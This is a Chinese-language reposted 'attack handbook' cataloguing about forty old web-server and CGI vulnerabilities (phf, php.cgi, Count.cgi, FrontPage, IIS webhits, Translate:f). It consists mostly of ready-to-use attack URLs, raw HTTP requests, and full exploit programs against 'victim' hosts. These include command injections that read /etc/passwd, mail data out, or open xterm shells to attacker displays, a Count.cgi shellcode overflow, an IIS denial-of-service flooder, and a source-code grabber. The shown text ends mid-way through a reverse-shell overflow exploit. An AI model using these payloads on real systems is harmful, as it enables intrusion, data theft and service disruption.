网络程序漏洞攻击手册(ZT)

ltkun

一. phf漏洞
    这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd:

    lynx http://www.victim.com/cgi-bin/ph ... n/cat%20/etc/passwd

    但是我们还能找到它吗?

二. php.cgi 2.0beta10或更早版本的漏洞
    可以读nobody权限的所有文件.

    lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

    php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在
/etc/master.passwd、/etc/security/passwd等.

三. whois_raw.cgi

    lynx http://www.victim.com/cgi-bin/wh ... 0Acat%20/etc/passwd
    lynx http://www.victim.com/cgi-bin/wh ... =%0A/usr/X11R6/bin/
xterm%20-display%20graziella.lame.org:0

四. faxsurvey

    lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

五. textcounter.pl
    如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令.

    #!/usr/bin/perl
    $URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this
    $EMAIL='pdoru@pop3.kappa.ro,root';           # please _DO_ _modify_ this
    if ($ARGV[0]) {   $CMD=$ARGV[0];}else{
      $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
    }$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\n";
    system({"wget"} "wget", $text, "-O/dev/null");
    system({"wget"} "wget", $text, "-O/dev/null");
    #system({"lynx"} "lynx", $text); #如果没有wget命令也可以用lynx
    #system({"lynx"} "lynx", $text);   

六. 一些版本(1.1)的info2www的漏洞
    $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami     $
    You have new mail.
    $

    说实在我不太明白.

七. pfdispaly.cgi

    lynx -source \
    'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

    pfdisplay.cgi还有另外一个漏洞可以执行命令
  
    lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
    or
    lynx -dump \
    http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

八. wrap

    lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

九. www-sql
    可以让你读一些受限制的页面如:
    在你的浏览器里输入:http://your.server/protected/something.html:
    被要求输入帐号和口令.而有www-sql就不必了:

    http://your.server/cgi-bin/www-sql/protected/something.html:

十. view-source

    lynx http://www.victim.com/cgi-bin/vi ... ../../../etc/passwd
     
十一.campas

    lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

十二.webgais

    telnet www.victim.com 80
    POST /cgi-bin/webgais HTTP/1.0
    Content-length: 85 (replace this with the actual length of the "exploit"line)
    query=';mail+drazvan\@pop3.kappa.ro
十三.websendmail

    telnet www.victim.com 80
    POST /cgi-bin/websendmail HTTP/1.0
    Content-length: xxx (should be replaced with the actual length of the
    string passed to the server, in this case xxx=90)
    receiver=;mail+your_address\@somewhere.org
十四.handler

    telnet www.victim.com 80
    GET /cgi-bin/handler/useless_shit;cat   /etc/passwd|?data=DownloadHTTP/1.0
    or
    GET /cgi-bin/handler/blah;xwsh  -display        yourhost.com|?data=Download
    or
    GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download

    注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令.
   
十五.test-cgi

    lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
    CGI/1.0 test script report:

    argc is 0. argv is .

    SERVER_SOFTWARE = NCSA/1.4B
    SERVER_NAME = victim.com
    GATEWAY_INTERFACE = CGI/1.1
    SERVER_PROTOCOL = HTTP/1.0
    SERVER_PORT = 80
    REQUEST_METHOD = GET
    HTTP_ACCEPT = text/plain, application/x-html, application/html,
    text/html, text/x-html
    PATH_INFO =
    PATH_TRANSLATED =
    SCRIPT_NAME = /cgi-bin/test-cgi
    QUERY_STRING = whatever
    REMOTE_HOST = fifth.column.gov
    REMOTE_ADDR = 200.200.200.200
    REMOTE_USER =
    AUTH_TYPE =
    CONTENT_TYPE =
    CONTENT_LENGTH =
    得到一些http的目录
   
    lynx http://www.victim.com/cgi-bin/te ... n/cat%20/etc/passwd
    这招好象并不管用.
    lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
    还可以这样试
        GET /cgi-bin/test-cgi?* HTTP/1.0
        GET /cgi-bin/test-cgi?x *
        GET /cgi-bin/nph-test-cgi?* HTTP/1.0
        GET /cgi-bin/nph-test-cgi?x *
        GET /cgi-bin/test-cgi?x HTTP/1.0 *
        GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

   
十六.对于某些BSD的apache可以:

    lynx http://www.victim.com/root/etc/passwd
    lynx http://www.victim.com/~root/etc/passwd
   
十七.htmlscript

    lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

十八.jj.c

    The demo cgi program jj.c calls /bin/mail without filtering user
    input, so any program based on jj.c could potentially be exploited by
    simply adding a   followed by a Unix command. It may require a
    password, but two known passwords include HTTPdrocks and SDGROCKS. If
    you can retrieve a copy of the compiled program running strings on it
    will probably reveil the password.

    Do a web search on jj.c to get a copy and study the code yourself if
    you have more questions.

十九.Frontpage extensions
    如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本
    和它在服务器上的路径. 还有一些密码文件如:

    http://www.victim.com/_vti_pvt/service.pwd
    http://www.victim.com/_vti_pvt/users.pwd
    http://www.victim.com/_vti_pvt/authors.pwd
    http://www.victim.com/_vti_pvt/administrators.pwd

二十.Freestats.com CGI
    没有碰到过,觉的有些地方不能搞错,所以直接贴英文.

    John Carlton  found following.   He developed  an exploit  for the
    free web stats services offered at freestats.com, and supplied the
    webmaster with proper code to patch the bug.

    Start an  account with  freestats.com, and  log in.   Click on the
    area that  says "CLICK  HERE TO  EDIT YOUR  USER PROFILE & COUNTER
    INFO" This will  call up a  file called edit.pl  with your user  #
    and password included in it.  Save this file to your hard disk and
    open it  with notepad.   The only  form of  security in  this is a
    hidden  attribute  on  the  form  element  of your account number.
    Change this from

        *input type=hidden name=account value=your#*

    to

        *input type=text name=account value=""*

    Save your page and load it into your browser.  Their will now be a
    text input box where the hidden element was before.  Simply type a
    # in and push the "click here to update user profile" and all  the
    information that appears  on your screen  has now been  written to
    that user profile.

    But that isn't the worst of it.  By using frames (2 frames, one to
    hold this page  you just made,  and one as  a target for  the form
    submission) you could change the password on all of their accounts
    with a simple JavaScript function.

    Deep inside the web site authors still have the good old "edit.pl"
    script. It takes some time to reach it (unlike the path described)
    but you can reach it directly at:

        http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

二十一.Vulnerability in Glimpse HTTP

    telnet target.machine.com 80
    GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\     HTTP/1.0

ltkun

二十二.Count.cgi
该程序只对Count.cgi 24以下版本有效：

/*### count.c ########################################################*/
#include  
#include
#include
#include
#include
#include
#include
#include
#include

/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);

/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";


int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;


offset = sp = cnt = ver = 0;
fprintf(stderr,"\t%s - Gus\n",argv[0]);
if (argc<3) usage(argv[0]);

while ((cnt = getopt(argc,argv,"h:d:v:")) != EOF) {
switch(cnt){
case 'h':
host = optarg;
break;
case 'd':
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case 'v':
ver = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

sp = offset + getsp(ver);


(void)doit(host,sp,shellcode);

exit(0);
}

unsigned long getsp(int ver) {

/* Get the stack pointer we should be using. YMMV. If it does not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;

if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don't have an sp for that version try using the -o option.\n");
fprintf(stderr,"Versions above 24 are patched for this bug.\n");
exit(1);
} else {
return sp;
}

}


int usage (char *name) {
fprintf(stderr,"\tUsage:%s -h host -d  -v  [-o ]\n",name);
fprintf(stderr,"\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n",name);
exit(1);
}

int openhost (char *host, int port) {

int sock;
struct hostent *he;
struct sockaddr_in sa;

he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname\n");
exit(-1);
}

memcpy(&sa.sin_addr, he->h_addr, he->h_length);

sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));

if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}

return(sock);
}


void doit (char *host,long sp, char *shellcode) {

int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";

bzero(buf);


for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;

qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;
qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);

sock = openhost(host,80);
write(sock,"GET /cgi-bin/Count.cgi?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0\n",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"\n\n",2);
sleep(1);

/* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n",qs,qs); */

/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./Count.cgi");
*/
}


用法是：count -h <攻击目标IP> -d <显示> -v
例如：count -h www.foo.bar -d 127.0.0.1:0 -v 22

  
用Count.cgi看图片
  
  http://attacked.host.com/cgi-bin ... ath_to_gif/file.gif


二十三.finger.cgi

    lynx http://www.victim.com/cgi-bin/finger?@localhost

    得到主机上登陆的用户名.
   
二十四.man.sh

     Robert Moniot  found followung.   The May  1998 issue  of SysAdmin
    Magazine  contains  an  article,  "Web-Enabled  Man  Pages", which
    includes source code for very nice cgi script named man.sh to feed
    man pages  to a  web browser.   The hypertext  links to  other man
    pages are an especially attractive feature.

    Unfortunately, this script is vulnerable to attack.   Essentially,
    anyone who can execute the cgi thru their web browser can run  any
    system commands with the user id of the web server and obtain  the
    output from them in a web page.

二十五.FormHandler.cgi
    在表格里加上
   
    你的邮箱里就有/etc/passwd

二十六.JFS
    相信大家都看过"JFS 侵入 PCWEEK-LINUX 主机的详细过程"这篇文章,他利用photoads
    这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样

    先lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?
AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%
0a11111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111&hone=11&Subject=la&pa
ssword=0&CityStPhone=0&Renewed=0"

    创建新AD值绕过 $AdNum 的检查后用

    lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?
file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111&DataFile=1&assword=0&FILE
_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/
\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'

    创建/覆盖用户 nobody 有权写的任何文件.
    不知我的理解是否对,在它的zip包里我找不到to_url脚本,不知哪位同志知道?

二十七.backdoor
    看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwshell.pl
    前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码.


二十八.shtml.dll
在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息：
http://www.victim.com/_vti_bin/shtml.dll/something.html
这样将返回以下信息：
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
但是如果我们请求并非HTML、SHTML或者ASP后缀的文件，我们将会得到不同的信息：
http://207.69.190.42/_vti_bin/shtml.dll/something.exe

shtml.dll对较长的带html后缀的文件名都会进行识别和处理，利用这一点，可以对IIS服务器执行DOS攻击，
以下这个程序，能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。系统在数分
钟内会报告应用程序日志已满：

#include   
#include   
#include   
#include   
#include   

void Dos(void *chara);

void main(int argc,char *argv[])
{
     WORD wVersionRequested;
     WSADATA wsaData;
     int err;
     long lDo ;
     if (argc < 2)
     {         
         printf("Usage: %s IP\n",argv[0]);
         exit(1);
         return ;
     }   

     wVersionRequested = MAKEWORD( 2, 2 );

     err = WSAStartup( wVersionRequested, &wsaData );
     if ( err != 0 )
     {   
        return;
     }


    if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 )
    {  
        WSACleanup( );
        return;
    }


     printf("wait ...\n");
     for (lDo = 0 ;lDo < 1000;lDo++)
     {
           //printf("1\n");
          _beginthread(Dos, 0, (void*)argv[1]);         
     }   
     Sleep( 1000000L );
}

void Dos(void *chara)
{
    long lLen;
    long lDo ;
    char *ip ;
    char buffer[2000];
    struct sockaddr_in serv_addr;     
    SOCKET sockfd ;   
    char plusvuln[]="GET /_vti_bin/shtml.dll/";
    ip= (char*)chara;
    memset(buffer,'\0',2000);

    serv_addr.sin_family =AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");     
    serv_addr.sin_port = htons(80);

    if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)
    {
         printf("Create Socket faild \n");
         return ;
    }

     if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)
     {
         printf("Connect faild \n");;
     }
     else
     {
         lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );
         for (lDo = 0 ;lDo < 7000;lDo ++)
         {
              lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;
              if (lLen < 0  )
              {
                  printf("Send faild \n");
                  return;
              }
         }
         lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;      
         //recv(sockfd,buffer,2000,0);
         //printf(buffer);
         //printf("\n");
    }
    closesocket(sockfd);
}


二十九.asp原代码暴露
http://somewhere/something.asp::$DATA
解决方案: 装sp3

http://somewhere/something.asp%2e
解决方案: 装sp4

http://somewhere/something.asp.(加一个点)
解决方案: 装sp4

http://somewhere/something%2e%41sp 或者
http://somewhere/something%2e%asp
解决方案: 装sp4

http://somewhere/something.asp%81
解决方案:装sp6或者打补丁


三十.null.htw
如果你的web目录下有asp文件，如存在http://www.xxx.com/asp/index.asp ... �以看到源码：
http://www.xxx.com/null.htw?CiWe ... eCiHiliteType=Full

三十一.showcode.asp
http://www.someserver.com/msadc/ ... LECTOR/showcode.asp

ltkun

三十二.SHTML.EXE
利用这个漏洞通过 FrontPage Server Extensions 的 shtml.exe 请求一URL，并且
URL 后要包含一个.htm extension 的 DOS 设备名。
http://www.example.com/_vti_bin/shtml.exe/com1.htm   
http://www.example.com/_vti_bin/shtml.exe/prn.htm   
http://www.example.com/_vti_bin/shtml.exe/aux.htm   
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm   
http://www.example.com/_vti_bin/shtml.exe/com1.asp   
http://www.example.com/_vti_bin/shtml.exe/com1   
http://www.example.com/_vti_bin/shtml.exe/prn   
http://www.example.com/_vti_bin/shtml.exe/com1   
http://www.example.com/_vti_bin/shtml.exe/aux   
http://www.example.com/_vti_bin/shtml.exe/pipe.htm   
  

三十三.htimage.exe
htimage存在三个安全问题：
1、暴露web根目录本地磁盘路径，正如你在上面看到的，使用下面的方式可以成功看到对方的web目录
磁盘路径位置：
http://www.xxx.com/cgi-bin/htimage.exe/linux?0,0

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with
FrontPage. I found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple
buffer overflow 3) Allow
us to access files.
2、缓冲溢出：
在 windows9x上，目标为Microsoft-PWS-95/2.0和 FrontPage-PWS32的服务器上测试通过。
http://www.xxx.com/cgi-bin/htimage.exe/<741个字符>?0,0.
这时在被攻击目标的控制台上将发现如下错误：


HTIMAGE caused an invalid page fault in
module  at 0000:41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:


Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c

server仍旧继续运行，出现 "500 Server Error"

3、可以访问文件，但不可读：
http://www.xxx.com/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
输出：
---------------------------------------------------------------------------
Error


Error calling HTImage:


HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
---------------------------------------------------------------------------


NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden


三十四.*.idc *.idq

暴露路径：
在IIS4.0中，只要没打services pack5,那么在www下输入这个路径：
http://www.xxx.com/*.idc
将出现:

运行查询错误
无法打开查询文件 e:\web\*.idc。可能是文件不存在或是您没有打开文件所需的许可权。

这个已经在sp5中补掉了
然而在IIS5.0中，这个问题又冒了出来，如微软的主页:

http://www.microsoft.com/vstudio/1.idq

将出现:

The IDQ file d:\http\products\developer\devonly\prodinfo\vstudio\1.idq
could not be found.  

输入
http://www.microsoft.com/1.ida
将出现:
The IDQ file d:\http\1.idq could not be found.  


三十五.webhit.dll

IIS4.0上有一个应用程序映射htw--->webhits.dll，这是用于Index Server的点击功能的。尽管你不
运行Index Server，该映射仍然有效。这个应用程序映射存在漏洞，允许入侵者读取本地硬盘上的文件，
数据库文件，和ASP源代码!有两种方法来实现，第一，如果你的web server上存在.htw后缀的文件，
则可以过下面的方式来查看文件内容，比如查看odbc.ini文件的内容:

http://www.xxx.com/iissamples/is ... eCiHiliteType=Full

对于IIS的一般安装模式可以在下列位置找到.htw文件:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw


第二、如果你的web server上不存在这个文件，有漏洞的系统仍然允许用户调用
webhits.dll，具体方式如下：

http://www.xxx.com/default.htm%2 ... itsFile=/../../winn
t/odbc.iniCiRestriction=noneCiHiliteType=Full
条件是default.htm必须存在。这个文件名可以是其它文件，但必须存在。
webhits.dll将会把这个文件作为临时文件打开。当上述URL中的空格符%20达到一定数
目时，web服务的识别功能可能会出现问题，这样webhits.dll将打开指定的文件
\winnt\odbc.ini。如果成功，用同样的方法可以打开更多的文件，包括ASP代码。近
似的原理请见下面这段代码：

FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)

{
// Just in case inetinfo.exe passes too long a string
// let's make sure it's of a suitable length and not
// going to open a buffer overrun vulnerability
char *file;
file = (char *)malloc(250);
strncpy(file,pathtohtwfile,250);
fd = fopen(file,"r");
// Success
if(fd !=NULL)
{
return 1;
}
// failed
else
{
return 0;
}
}


三十六.Translate:f
在win2000及office 2000(包括FrontPage 2000及FrontPage 2000 server extensions)里的WebDAV存在
着一个安全问题Translate:f。当某人往目标机器的ASP/ASA(或者其它脚本文件)发送包含有"Translate:f"
文件头的HTTP GET请求时，windows2000(没有打过SP1补丁的——现在打补丁的还不是很多吧 会返回
该ASP/ASA的源代码而不是本该返回的经过处理的文件(还需要在url的结尾加上一个特殊字符"/")。

smiler就此漏洞发表了一个用perl写成的利用程序：

-----------------------------start-----------------------------------------
-------
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using
a shared drive but I haven磘 tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG

if (not $ARGV[0]) {
print qq~
Geee it磗 running !! kewl ))
Usage : srcgrab.pl
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl
http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the
backslash at the end of the url
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header )
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
---------------------------------end---------------------------------------

要使用这一程序，你可能需要下载几个perl的模块(可以到http://www.perl.org上去search)
1、libwww-perl-5.48.tar.gz
2、URI-1.09.tar.gz
3、HTML-Parser-3.11.tar.gz
每个包只有几十K大吧，下载解包后进入目录，运行
#perl Makefile.PL&&make&&make install
就可以了。have fun
(有些asp文件可能要在url后加上?或者/才能看到源码)


三十七.ftp.pl
http://www.server.com/cgi-bin/ft ... /../../../../../etc
这将暴露所有etc目录下面的文件。以此类推，你可以阅览其它目录下的东西，从而突破本身ftp目录的限制。


三十八.CGI-World Poll
任意远程用户通过GET请求指定。导致非授权的文件访问:
http://www.victim.com/cgi-bin/po ... _dir=/etc/passwd%00

三十九.Big Brother
Big Brother 1.4H 以及更低版本存在一个安全问题，由于一个脚本对输入变量$HOSTSVC 缺乏正确检查，
导致远程用户可以指定路径来浏览任意系统文件内容。

http://www.victim.com/cgi-bin/bb ... ../../../etc/passwd


四十.Nortel Contivity package CGI

入侵者或恶意的用户将能使用类似以下的URL查看到系统上的所有文件。
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
(入侵者感兴趣的文件也许将会是：/system/filelist.dat, /system/version.dat,/system/keys,
/system/core, etc)

四十一.wais.pl + waisq CGI
wais.pl + waisq是运行在NCSA服务器上的一个WAIS接口CGI,在这个程序内部存在一个
漏洞,能使攻击者通过远程溢出获得一个具有web server相同权限的shell。
/*
OnWaisKlote.c - NCSA wais.pl + waisq remote overflow - by Scrippie

The shellcode makes a connetion to the given IP and spawns a shell on port
27002. It's recommended to have a listening netcat ready on this port.
Ie. do a "nc -l -p 27002" on your machine, and run the exploit on the target
If everything works out, it'll connect and spawn a shell.
*/

#include
#include
#include
#include
#include
#include
#include

#define FORBIDDEN "\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~|\""
#define SZ_SOURCEBUF 256
#define SZ_FILEBUF 256
#define RETADDY 0xbffff910 /* Works on my cute `lil box */

int wwwconnect(unsigned long ip);
int ICinInt(long, char *, size_t);
char *buildOverflow(unsigned long, unsigned int);
void *xmalloc(size_t);

/*
Shellcode written by: Scrippie

Smegma v0.5 ridded this shellcode of the following characters:
